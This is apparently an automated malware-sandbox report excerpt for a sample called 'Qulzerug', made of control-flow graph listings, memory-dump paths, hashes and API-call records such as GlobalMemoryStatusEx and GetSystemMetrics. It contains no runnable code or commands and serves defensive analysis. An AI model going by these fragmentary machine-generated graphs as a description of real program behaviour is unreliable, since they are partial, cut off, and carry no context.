2188->2193 2192->2133 2198 6d5e021-6d5e02d 2192->2198 2203 6d5dfd1-6d5dfd7 2193->2203 2204 6d5da41-6d5da9f 2193->2204 2198->2124 2198->2125 2205 6d5dfdd-6d5dfe3 2203->2205 2204->2203 2213 6d5daa5-6d5db03 2204->2213 2205->2133 2206 6d5dfe5-6d5dfeb 2205->2206 2206->2192 2206->2193 2213->2203 2220 6d5db09-6d5dbcf 2213->2220 2236 6d5dc04-6d5dc0a 2220->2236 2237 6d5dbd1-6d5dbfe 2220->2237 2236->2133 2238 6d5dc10-6d5dc17 2236->2238 2237->2236 2249 6d5dd79-6d5dd7d 2237->2249 2239 6d5dca4-6d5dd01 2238->2239 2240 6d5dc1d-6d5dc23 2238->2240 2256 6d5dd67-6d5dd74 2239->2256 2257 6d5dd03-6d5dd61 2239->2257 2240->2133 2242 6d5dc29-6d5dc2c 2240->2242 2242->2239 2249->2205 2251 6d5dd83-6d5ddb0 2249->2251 2261 6d5dde5-6d5ddeb 2251->2261 2262 6d5ddb2-6d5dddf 2251->2262 2256->2205 2257->2256 2280 6d5dc2e-6d5dc9b 2257->2280 2261->2133 2264 6d5ddf1-6d5ddf8 2261->2264 2262->2205 2262->2261 2266 6d5de09-6d5de2d 2264->2266 2267 6d5ddfa-6d5de00 2264->2267 2279 6d5dea5-6d5df02 2266->2279 2267->2133 2269 6d5de06 2267->2269 2269->2266 2293 6d5df04-6d5df62 2279->2293 2294 6d5df68-6d5dfcf 2279->2294 2280->2133 2301 6d5dca1 2280->2301 2293->2294 2310 6d5de2f-6d5de9c 2293->2310 2294->2192 2301->2239 2310->2133 2320 6d5dea2 2310->2320 2320->2279
                        APIs
                        Memory Dump Source
                        • Source File: 0000000C.00000002.2524638093.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_6d50000_Qulzerug.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: aa282d2e0e2a9e9bcaf409938c9736883478968a9261f5375d73abc1330147c8
                        • Instruction ID: 68cf860220b6d45ce9190e751c12854559aee16ded40bd8dca1993e1799018ea
                        • Opcode Fuzzy Hash: aa282d2e0e2a9e9bcaf409938c9736883478968a9261f5375d73abc1330147c8
                        • Instruction Fuzzy Hash: 45620870A002148FDBA4EF79C854BAEBBF2BF88704F2184A9D419AB395DE719D41CF51

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2321 6dedcb0-6dedd05 LdrInitializeThunk 2322 6dedd0b-6dedd1e 2321->2322 2323 6dedda3-6deddae 2321->2323 2324 6dee28d-6dee2be 2322->2324 2325 6dedd24-6dedd73 2322->2325 2326 6deddb0-6deddbc 2323->2326 2327 6deddc1-6deddd4 2323->2327 2350 6dedd84-6dedd91 2325->2350 2351 6dedd75-6dedd82 2325->2351 2328 6dee2e9-6dee2f0 2326->2328 2327->2324 2329 6deddda-6deddf0 2327->2329 2333 6dee2f7-6dee305 2328->2333 2334 6dee2f2 2328->2334 2329->2324 2332 6deddf6-6dede33 2329->2332 2345 6dee288 2332->2345 2346 6dede39-6dede61 2332->2346 2334->2333 2345->2324 2346->2324 2354 6dede67-6dede90 2346->2354 2350->2345 2353 6dedd97-6dedd9d 2350->2353 2351->2323 2353->2322 2353->2323 2354->2345 2356 6dede96-6dedea2 2354->2356 2357 6dedea8-6dedeb8 2356->2357 2358 6dee203-6dee216 2356->2358 2357->2324 2360 6dedebe-6dedeeb 2357->2360 2358->2324 2359 6dee218-6dee22b 2358->2359 2359->2345 2361 6dee22d-6dee241 2359->2361 2360->2324 2368 6dedef1-6dedf93 call 6dee3a8 2360->2368 2361->2345 2364 6dee243-6dee245 2361->2364 2430 6dee248 call 161dd60 2364->2430 2431 6dee248 call 161dd57 2364->2431 2367 6dee24e-6dee251 2367->2328 2381 6dedf99-6dedfa9 2368->2381 2382 6dee0a1-6dee0b1 2368->2382 2381->2324 2383 6dedfaf-6dee02b 2381->2383 2382->2324 2384 6dee0b7-6dee130 call 6dee3a8 2382->2384 2383->2324 2403 6dee031-6dee039 2383->2403 2405 6dee136-6dee148 call 6de6600 2384->2405 2403->2324 2404 6dee03f-6dee06b 2403->2404 2409 6dee06d-6dee071 2404->2409 2410 6dee090-6dee099 2404->2410 2405->2358 2411 6dee14e-6dee164 2405->2411 2409->2324 2412 6dee077-6dee08e 2409->2412 2410->2382 2413 6dee17c-6dee184 2411->2413 2414 6dee166-6dee16c 2411->2414 2412->2410 2413->2345 2418 6dee18a-6dee1ca call 6de9258 2413->2418 2415 6dee16e 2414->2415 2416 6dee170-6dee17a 2414->2416 2415->2413 2416->2413 2418->2324 2426 6dee1d0-6dee1f1 2418->2426 2426->2345 2429 6dee1f7-6dee1fd 2426->2429 2429->2357 2429->2358 2430->2367 2431->2367
                        APIs
                        Memory Dump Source
                        • Source File: 0000000C.00000002.2525433407.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_6de0000_Qulzerug.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: b520fecdd182121ae7f16ba4e72e7e757a76db222c7db363a5ab76bc3a95fbb3
                        • Instruction ID: 3f662c6af55138fc759252a646a6eef54f321b3aad67b5f72105e201ed911a0a
                        • Opcode Fuzzy Hash: b520fecdd182121ae7f16ba4e72e7e757a76db222c7db363a5ab76bc3a95fbb3
                        • Instruction Fuzzy Hash: 42025D70E002098FDB54DFA9C884B9EBBF2BF88304F258569D419AB395DB74EC45CB90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2434 161a7f0-161a7fb 2435 161a825-161a844 call 1619dbc 2434->2435 2436 161a7fd-161a824 call 1619db0 2434->2436 2442 161a846-161a849 2435->2442 2443 161a84a-161a8a9 2435->2443 2451 161a8ab-161a8ae 2443->2451 2452 161a8af-161a93c GlobalMemoryStatusEx 2443->2452 2456 161a945-161a96d 2452->2456 2457 161a93e-161a944 2452->2457 2457->2456
                        Memory Dump Source
                        • Source File: 0000000C.00000002.2499168031.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_1610000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4caa2b1af34a251a13f73b2ea9cd5dde516157fe5f991d5c623f374260d2dd0c
                        • Instruction ID: ca5122aedd6784231eef276308a31182e4b008fa1594c699e6ba1f10fdbac025
                        • Opcode Fuzzy Hash: 4caa2b1af34a251a13f73b2ea9cd5dde516157fe5f991d5c623f374260d2dd0c
                        • Instruction Fuzzy Hash: E2412372D003998FCB14DFB9D8003EEBBF5BF89210F19856AC844A7341EB789945CB90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2460 6dedcab-6dedcae 2461 6dedcb0-6dedd05 LdrInitializeThunk 2460->2461 2462 6dedd0b-6dedd1e 2461->2462 2463 6dedda3-6deddae 2461->2463 2464 6dee28d-6dee2be 2462->2464 2465 6dedd24-6dedd73 2462->2465 2466 6deddb0-6deddbc 2463->2466 2467 6deddc1-6deddd4 2463->2467 2490 6dedd84-6dedd91 2465->2490 2491 6dedd75-6dedd82 2465->2491 2468 6dee2e9-6dee2f0 2466->2468 2467->2464 2469 6deddda-6deddf0 2467->2469 2473 6dee2f7-6dee305 2468->2473 2474 6dee2f2 2468->2474 2469->2464 2472 6deddf6-6dede33 2469->2472 2485 6dee288 2472->2485 2486 6dede39-6dede61 2472->2486 2474->2473 2485->2464 2486->2464 2494 6dede67-6dede90 2486->2494 2490->2485 2493 6dedd97-6dedd9d 2490->2493 2491->2463 2493->2462 2493->2463 2494->2485 2496 6dede96-6dedea2 2494->2496 2497 6dedea8-6dedeb8 2496->2497 2498 6dee203-6dee216 2496->2498 2497->2464 2500 6dedebe-6dedeeb 2497->2500 2498->2464 2499 6dee218-6dee22b 2498->2499 2499->2485 2501 6dee22d-6dee241 2499->2501 2500->2464 2508 6dedef1-6dedf49 2500->2508 2501->2485 2504 6dee243-6dee245 2501->2504 2571 6dee248 call 161dd60 2504->2571 2572 6dee248 call 161dd57 2504->2572 2507 6dee24e-6dee251 2507->2468 2516 6dedf50-6dedf5c call 6dee3a8 2508->2516 2517 6dedf62-6dedf93 2516->2517 2521 6dedf99-6dedfa9 2517->2521 2522 6dee0a1-6dee0b1 2517->2522 2521->2464 2523 6dedfaf-6dee02b 2521->2523 2522->2464 2524 6dee0b7-6dee116 2522->2524 2523->2464 2543 6dee031-6dee039 2523->2543 2542 6dee120-6dee130 call 6dee3a8 2524->2542 2545 6dee136-6dee148 call 6de6600 2542->2545 2543->2464 2544 6dee03f-6dee06b 2543->2544 2549 6dee06d-6dee071 2544->2549 2550 6dee090-6dee099 2544->2550 2545->2498 2551 6dee14e-6dee164 2545->2551 2549->2464 2552 6dee077-6dee08e 2549->2552 2550->2522 2553 6dee17c-6dee184 2551->2553 2554 6dee166-6dee16c 2551->2554 2552->2550 2553->2485 2558 6dee18a-6dee1ca call 6de9258 2553->2558 2555 6dee16e 2554->2555 2556 6dee170-6dee17a 2554->2556 2555->2553 2556->2553 2558->2464 2566 6dee1d0-6dee1f1 2558->2566 2566->2485 2569 6dee1f7-6dee1fd 2566->2569 2569->2497 2569->2498 2571->2507 2572->2507
                        APIs
                        Memory Dump Source
                        • Source File: 0000000C.00000002.2525433407.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_6de0000_Qulzerug.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 768c4eabe36d97751880ca3f98f77bea4346852d903c23eacfe683d0ff7a7b41
                        • Instruction ID: 02c50fcee1e6d6ec2b6ca31df1680173a63e757dc5fb7eecd6f99a6078a18856
                        • Opcode Fuzzy Hash: 768c4eabe36d97751880ca3f98f77bea4346852d903c23eacfe683d0ff7a7b41
                        • Instruction Fuzzy Hash: E2315A70E012188FDB25DFA8C5446DDBBF2FF88314F248569D855AB381DB71AC4ACB90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2574 6d50040-6d5007e LdrInitializeThunk 2575 6d50091-6d500a4 2574->2575 2576 6d50080-6d5008c 2574->2576 2578 6d50132-6d50163 2575->2578 2579 6d500aa-6d500ba 2575->2579 2577 6d5018e-6d50195 2576->2577 2580 6d50197-6d5019c 2577->2580 2581 6d5019f-6d501a6 2577->2581 2582 6d500cd-6d500e3 2579->2582 2583 6d500bc-6d500c8 2579->2583 2580->2581 2582->2578 2585 6d500e5-6d500f2 2582->2585 2583->2577 2585->2578 2587 6d500f4-6d500fb 2585->2587 2587->2577
                        APIs
                        Memory Dump Source
                        • Source File: 0000000C.00000002.2524638093.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_6d50000_Qulzerug.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 24f7292223a021410e42abf12d29cf9d7420a9515d18977b28ca10d6c38e237a
                        • Instruction ID: cf8be908e5a9fedff736add12b126452c11e6a13cdf3386e9ddfdf0be38758e5
                        • Opcode Fuzzy Hash: 24f7292223a021410e42abf12d29cf9d7420a9515d18977b28ca10d6c38e237a
                        • Instruction Fuzzy Hash: C3314774A00209AFDB44CF99D5C0ADDFBF2FF84314F66C659E804AB285C735A989CB94

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2589 161a689-161a695 2591 161a627 2589->2591 2592 161a5cd-161a624 2589->2592 2594 161a62e 2591->2594 2592->2594 2596 161a634-161a665 GetSystemMetrics 2594->2596 2598 161a667-161a66d 2596->2598 2599 161a66e-161a682 2596->2599 2598->2599
                        APIs
                        • GetSystemMetrics.USER32(00000043), ref: 0161A654
                        Memory Dump Source
                        • Source File: 0000000C.00000002.2499168031.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_1610000_Qulzerug.jbxd
                        Similarity
                        • API ID: MetricsSystem
                        • String ID:
                        • API String ID: 4116985748-0
                        • Opcode ID: 5c73c0ac2588f4e0c4ed9f2ed96b0185ed9a64023d8b1fcc4d24ac89054106e0
                        • Instruction ID: 546317cdc4fed04afd71aa79b0ca4e9d21e9eb9a6fd2516909fd21509b8824c7
                        • Opcode Fuzzy Hash: 5c73c0ac2588f4e0c4ed9f2ed96b0185ed9a64023d8b1fcc4d24ac89054106e0
                        • Instruction Fuzzy Hash: 7621AFB58093848FCB219FA8D8543EEBFF0EF5A310F18449AC096AB352D7385644CFA5

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2601 161a8c0-161a906 2603 161a90e-161a93c GlobalMemoryStatusEx 2601->2603 2604 161a945-161a96d 2603->2604 2605 161a93e-161a944 2603->2605 2605->2604
                        APIs
                        • GlobalMemoryStatusEx.KERNELBASE(00000012), ref: 0161A92F
                        Memory Dump Source
                        • Source File: 0000000C.00000002.2499168031.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_1610000_Qulzerug.jbxd
                        Similarity
                        • API ID: GlobalMemoryStatus
                        • String ID:
                        • API String ID: 1890195054-0
                        • Opcode ID: 4d6ee44df04a36bc51cb7a816d5cc685dad596d22f83ff06a0ddca0875bff51d
                        • Instruction ID: 4a2c2eca36fd273a5f71bd2710c1576a990d50a7e7ecbf715c2bd0223bdb09e0
                        • Opcode Fuzzy Hash: 4d6ee44df04a36bc51cb7a816d5cc685dad596d22f83ff06a0ddca0875bff51d
                        • Instruction Fuzzy Hash: 201147B1C006599FDB10CF9AC544BDEFBF4AF08310F15812AD858A7240D378A944CFE5

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2608 161a5d8-161a62e 2610 161a634-161a665 GetSystemMetrics 2608->2610 2612 161a667-161a66d 2610->2612 2613 161a66e-161a682 2610->2613 2612->2613
                        APIs
                        • GetSystemMetrics.USER32(00000043), ref: 0161A654
                        Memory Dump Source
                        • Source File: 0000000C.00000002.2499168031.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_1610000_Qulzerug.jbxd
                        Similarity
                        • API ID: MetricsSystem
                        • String ID:
                        • API String ID: 4116985748-0
                        • Opcode ID: cabd57708b33f6fea5c5d41f4cf8e9c973cb3323730ca744566ea18dd0ab7b07
                        • Instruction ID: 3a030fb97c170088f8e458e51ac40c226303a4c5a2da9055b6cdadeff81889f8
                        • Opcode Fuzzy Hash: cabd57708b33f6fea5c5d41f4cf8e9c973cb3323730ca744566ea18dd0ab7b07
                        • Instruction Fuzzy Hash: 691167B58053888FDB209FA9D4487EEBFF0EB49310F14845ED599A7340D7346684CFA5

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2615 161a8c8-161a906 2616 161a90e-161a93c GlobalMemoryStatusEx 2615->2616 2617 161a945-161a96d 2616->2617 2618 161a93e-161a944 2616->2618 2618->2617
                        APIs
                        • GlobalMemoryStatusEx.KERNELBASE(00000012), ref: 0161A92F
                        Memory Dump Source
                        • Source File: 0000000C.00000002.2499168031.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_1610000_Qulzerug.jbxd
                        Similarity
                        • API ID: GlobalMemoryStatus
                        • String ID:
                        • API String ID: 1890195054-0
                        • Opcode ID: 8f0162532a050f2ae0fa2006aa9c3fd22c32553e08a352ffb6918adcead668cc
                        • Instruction ID: 6e003abd17f397241cf9669754ee2ec4c668fc6e8b157afd15998ed198162afe
                        • Opcode Fuzzy Hash: 8f0162532a050f2ae0fa2006aa9c3fd22c32553e08a352ffb6918adcead668cc
                        • Instruction Fuzzy Hash: 7C1123B1C006599FDB10CFAAC944BDEFBF4AF48320F15812AD818A7240D378A944CFA5

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2687 6d5003b-6d5007e LdrInitializeThunk 2689 6d50091-6d500a4 2687->2689 2690 6d50080-6d5008c 2687->2690 2692 6d50132-6d50163 2689->2692 2693 6d500aa-6d500ba 2689->2693 2691 6d5018e-6d50195 2690->2691 2694 6d50197-6d5019c 2691->2694 2695 6d5019f-6d501a6 2691->2695 2696 6d500cd-6d500e3 2693->2696 2697 6d500bc-6d500c8 2693->2697 2694->2695 2696->2692 2699 6d500e5-6d500f2 2696->2699 2697->2691 2699->2692 2701 6d500f4-6d500fb 2699->2701 2701->2691
                        APIs
                        Memory Dump Source
                        • Source File: 0000000C.00000002.2524638093.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_6d50000_Qulzerug.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: bc5a425503472236efea30a67b9ab5325fb9de50163e8a4ba199305031294fd7
                        • Instruction ID: c3d1dd17528cbd0f5dc3bf54ade879356c4e7ff10d3645915a6eb6dfeafb303e
                        • Opcode Fuzzy Hash: bc5a425503472236efea30a67b9ab5325fb9de50163e8a4ba199305031294fd7
                        • Instruction Fuzzy Hash: 6C01AD71E01218ABDF14CF99E884ACDFBB6FF88314F258529F80077240C771A988CBA4
                        Memory Dump Source
                        • Source File: 0000000C.00000002.2498010791.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_147d000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dfc783c4032e55a73d517c1cbd62e6a7503d2074265ab240c2cc6af7cc2f6643
                        • Instruction ID: 040e9e9521d4dc5c94271ebc52c2c73981dec1089df5989e3a413616e6abe1dc
                        • Opcode Fuzzy Hash: dfc783c4032e55a73d517c1cbd62e6a7503d2074265ab240c2cc6af7cc2f6643
                        • Instruction Fuzzy Hash: 0A2125B5904380DFDB16DF54D980B56BBA1EF84318F24C56ED90A0B366C336D447CA61
                        Memory Dump Source
                        • Source File: 0000000C.00000002.2498010791.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_147d000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fd006ec74102e7233e274382e3db65e5d844182aed1227e83e0de17fddc735e7
                        • Instruction ID: 26a13071df218670f5e3568f1d77ae8ab34b4e11017fcf71ba78d138b5a1ec43
                        • Opcode Fuzzy Hash: fd006ec74102e7233e274382e3db65e5d844182aed1227e83e0de17fddc735e7
                        • Instruction Fuzzy Hash: 742160755093C08FD713CF24D590755BF71EF46214F28C5DAD8498B667C33A980ACB62

                        Execution Graph

                        Execution Coverage:13.2%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:82
                        Total number of Limit Nodes:7
                        execution_graph 32976 68dd258 32977 68dd280 LdrInitializeThunk 32976->32977 32979 68dd2ee 32977->32979 32890 696dcb0 LdrInitializeThunk 32892 696dd0b 32890->32892 32891 696ddb0 32892->32891 32894 102dd60 32892->32894 32896 102dd8a 32894->32896 32895 102f67e 32895->32891 32896->32895 32897 102e635 LdrInitializeThunk 32896->32897 32897->32896 32980 696fc60 32982 696fc77 32980->32982 32981 696fc94 32982->32981 32985 68d0006 32982->32985 32989 68d0040 32982->32989 32986 68d0034 32985->32986 32987 68d0042 LdrInitializeThunk 32986->32987 32988 68d0080 32986->32988 32987->32988 32988->32981 32990 68d0042 LdrInitializeThunk 32989->32990 32991 68d0080 32990->32991 32991->32981 32898 1023108 32899 1023126 32898->32899 32910 102a5d8 32899->32910 32900 1023557 32914 102a730 32900->32914 32901 102364c 32919 102a971 32901->32919 32902 1023760 32924 102a9f9 32902->32924 32903 10238ce 32929 102aa80 32903->32929 32904 10239e2 32911 102a62e GetSystemMetrics 32910->32911 32913 102a667 32911->32913 32913->32900 32915 102a74d 32914->32915 32934 102a7a8 32915->32934 32940 102a7b8 32915->32940 32916 102a778 32916->32901 32921 102a98d 32919->32921 32920 102a9b7 32920->32902 32957 102a9c0 32921->32957 32961 102a9d0 32921->32961 32926 102aa15 32924->32926 32925 102aa3f 32925->32903 32964 102aa58 32926->32964 32967 102aa48 32926->32967 32931 102aa9d 32929->32931 32930 102aac7 32930->32904 32970 102aae0 32931->32970 32973 102aad1 32931->32973 32935 102a7b6 32934->32935 32936 102a798 32934->32936 32944 102a7e0 32935->32944 32950 102a7f0 32935->32950 32936->32916 32937 102a7c6 32937->32916 32942 102a7e0 GlobalMemoryStatusEx 32940->32942 32943 102a7f0 GlobalMemoryStatusEx 32940->32943 32941 102a7c6 32941->32916 32942->32941 32943->32941 32945 102a79f 32944->32945 32947 102a7ea 32944->32947 32945->32937 32946 102a7fd 32946->32937 32947->32946 32948 102a90e GlobalMemoryStatusEx 32947->32948 32949 102a93e 32948->32949 32949->32937 32951 102a7fd 32950->32951 32954 102a825 32950->32954 32951->32937 32952 102a846 32952->32937 32953 102a8ab 32953->32937 32954->32952 32954->32953 32955 102a90e GlobalMemoryStatusEx 32954->32955 32956 102a93e 32955->32956 32956->32937 32958 102a9cf 32957->32958 32960 102a9dd 32957->32960 32959 102a7f0 GlobalMemoryStatusEx 32958->32959 32959->32960 32960->32920 32962 102a9dd 32961->32962 32963 102a7f0 GlobalMemoryStatusEx 32961->32963 32962->32920 32963->32962 32965 102a7f0 GlobalMemoryStatusEx 32964->32965 32966 102aa65 32964->32966 32965->32966 32966->32925 32968 102a7f0 GlobalMemoryStatusEx 32967->32968 32969 102aa65 32968->32969 32969->32925 32971 102aaed 32970->32971 32972 102a7f0 GlobalMemoryStatusEx 32970->32972 32971->32930 32972->32971 32974 102a7f0 GlobalMemoryStatusEx 32973->32974 32975 102aaed 32974->32975 32975->32930
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2498823227.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_1020000_Qulzerug.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: Y
                        • API String ID: 2994545307-3233089245
                        • Opcode ID: eed7b327dc409bcb77e12fe2481698f4b5f5000dddf90d93e7f6f6c6a7bc4a2c
                        • Instruction ID: 741733abc21c5555664d67c94753dc9eb3126a351e146aa300e77c028c015f34
                        • Opcode Fuzzy Hash: eed7b327dc409bcb77e12fe2481698f4b5f5000dddf90d93e7f6f6c6a7bc4a2c
                        • Instruction Fuzzy Hash: 3A132A70D107198ECB65EF69C884A9DF7B1FF89300F50C699E458AB261EB70AAC5CF41

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1096 68dd258-68dd2e7 LdrInitializeThunk 1103 68dd2ee-68dd3f9 1096->1103 1121 68dd3ff-68dd42b 1103->1121 1122 68de056-68de098 call 68d0950 1103->1122 1125 68dd4cb-68dd639 1121->1125 1126 68dd431-68dd48a 1121->1126 1138 68de09d-68de0a4 1122->1138 1164 68dd63f-68dd648 1125->1164 1165 68de033-68de04f call 68d0950 1125->1165 1126->1122 1143 68dd490-68dd4c5 1126->1143 1143->1125 1164->1122 1166 68dd64e-68dd696 1164->1166 1165->1138 1173 68dd69c-68dd7b8 1166->1173 1174 68de051 1166->1174 1173->1174 1192 68dd7be-68dd8a6 1173->1192 1174->1122 1192->1122 1208 68dd8ac-68dd8b4 1192->1208 1208->1122 1209 68dd8ba-68dd8c2 1208->1209 1209->1122 1210 68dd8c8-68dd8eb 1209->1210 1212 68dd8ed-68dd8f1 1210->1212 1213 68dd901-68dd905 1210->1213 1212->1122 1214 68dd8f7-68dd8ff 1212->1214 1215 68dd91f-68dd985 1213->1215 1216 68dd907-68dd90b 1213->1216 1214->1213 1226 68dd98e 1215->1226 1227 68dd987-68dd98c 1215->1227 1216->1122 1217 68dd911-68dd919 1216->1217 1217->1215 1228 68dd995-68dd9d8 1226->1228 1227->1228 1232 68dd9de-68dda3b 1228->1232 1233 68ddff1-68de01f 1228->1233 1243 68ddfd1-68ddfd7 1232->1243 1244 68dda41-68dda9f 1232->1244 1233->1174 1238 68de021-68de02d 1233->1238 1238->1164 1238->1165 1245 68ddfdd-68ddfe3 1243->1245 1244->1243 1253 68ddaa5-68ddb03 1244->1253 1245->1174 1247 68ddfe5-68ddfeb 1245->1247 1247->1232 1247->1233 1253->1243 1260 68ddb09-68ddbcf 1253->1260 1276 68ddc04-68ddc0a 1260->1276 1277 68ddbd1-68ddbfe 1260->1277 1276->1174 1278 68ddc10-68ddc17 1276->1278 1277->1276 1289 68ddd79-68ddd7d 1277->1289 1279 68ddc1d-68ddc23 1278->1279 1280 68ddca4-68ddd01 1278->1280 1279->1174 1282 68ddc29-68ddc2c 1279->1282 1296 68ddd67-68ddd74 1280->1296 1297 68ddd03-68ddd61 1280->1297 1282->1280 1289->1245 1290 68ddd83-68dddb0 1289->1290 1302 68ddde5-68dddeb 1290->1302 1303 68dddb2-68ddddf 1290->1303 1296->1245 1297->1296 1320 68ddc2e-68ddc9b 1297->1320 1302->1174 1304 68dddf1-68dddf8 1302->1304 1303->1245 1303->1302 1305 68dde09-68dde2d 1304->1305 1306 68dddfa-68dde00 1304->1306 1319 68ddea5-68ddf02 1305->1319 1306->1174 1309 68dde06 1306->1309 1309->1305 1333 68ddf68-68ddfcf 1319->1333 1334 68ddf04-68ddf62 1319->1334 1320->1174 1341 68ddca1 1320->1341 1333->1233 1334->1333 1350 68dde2f-68dde9c 1334->1350 1341->1280 1350->1174 1360 68ddea2 1350->1360 1360->1319
                        APIs
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2523927826.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_68d0000_Qulzerug.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: a0e811cf406d9faba57358f56ef9cfe634283c23213c20db4b63174f516a5ccc
                        • Instruction ID: 223c97118f4c4ed15c337f56955f1cc94589ac043c7d1d2edca4815f3eef57b8
                        • Opcode Fuzzy Hash: a0e811cf406d9faba57358f56ef9cfe634283c23213c20db4b63174f516a5ccc
                        • Instruction Fuzzy Hash: 00822A74B402149FDB94EB79C854BAE7BF2BF88340F2084A9E419EB395DE74AC418F51

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1771 68dd24a-68dd253 1772 68dd254-68dd255 1771->1772 1772->1772 1773 68dd257-68dd2be 1772->1773 1779 68dd2c9-68dd2e7 LdrInitializeThunk 1773->1779 1780 68dd2ee-68dd3f9 1779->1780 1798 68dd3ff-68dd42b 1780->1798 1799 68de056-68de098 call 68d0950 1780->1799 1802 68dd4cb-68dd639 1798->1802 1803 68dd431-68dd48a 1798->1803 1815 68de09d-68de0a4 1799->1815 1841 68dd63f-68dd648 1802->1841 1842 68de033-68de04f call 68d0950 1802->1842 1803->1799 1820 68dd490-68dd4c5 1803->1820 1820->1802 1841->1799 1843 68dd64e-68dd696 1841->1843 1842->1815 1850 68dd69c-68dd7b8 1843->1850 1851 68de051 1843->1851 1850->1851 1869 68dd7be-68dd8a6 1850->1869 1851->1799 1869->1799 1885 68dd8ac-68dd8b4 1869->1885 1885->1799 1886 68dd8ba-68dd8c2 1885->1886 1886->1799 1887 68dd8c8-68dd8eb 1886->1887 1889 68dd8ed-68dd8f1 1887->1889 1890 68dd901-68dd905 1887->1890 1889->1799 1891 68dd8f7-68dd8ff 1889->1891 1892 68dd91f-68dd985 1890->1892 1893 68dd907-68dd90b 1890->1893 1891->1890 1903 68dd98e 1892->1903 1904 68dd987-68dd98c 1892->1904 1893->1799 1894 68dd911-68dd919 1893->1894 1894->1892 1905 68dd995-68dd9d8 1903->1905 1904->1905 1909 68dd9de-68dda3b 1905->1909 1910 68ddff1-68de01f 1905->1910 1920 68ddfd1-68ddfd7 1909->1920 1921 68dda41-68dda9f 1909->1921 1910->1851 1915 68de021-68de02d 1910->1915 1915->1841 1915->1842 1922 68ddfdd-68ddfe3 1920->1922 1921->1920 1930 68ddaa5-68ddb03 1921->1930 1922->1851 1924 68ddfe5-68ddfeb 1922->1924 1924->1909 1924->1910 1930->1920 1937 68ddb09-68ddbcf 1930->1937 1953 68ddc04-68ddc0a 1937->1953 1954 68ddbd1-68ddbfe 1937->1954 1953->1851 1955 68ddc10-68ddc17 1953->1955 1954->1953 1966 68ddd79-68ddd7d 1954->1966 1956 68ddc1d-68ddc23 1955->1956 1957 68ddca4-68ddd01 1955->1957 1956->1851 1959 68ddc29-68ddc2c 1956->1959 1973 68ddd67-68ddd74 1957->1973 1974 68ddd03-68ddd61 1957->1974 1959->1957 1966->1922 1967 68ddd83-68dddb0 1966->1967 1979 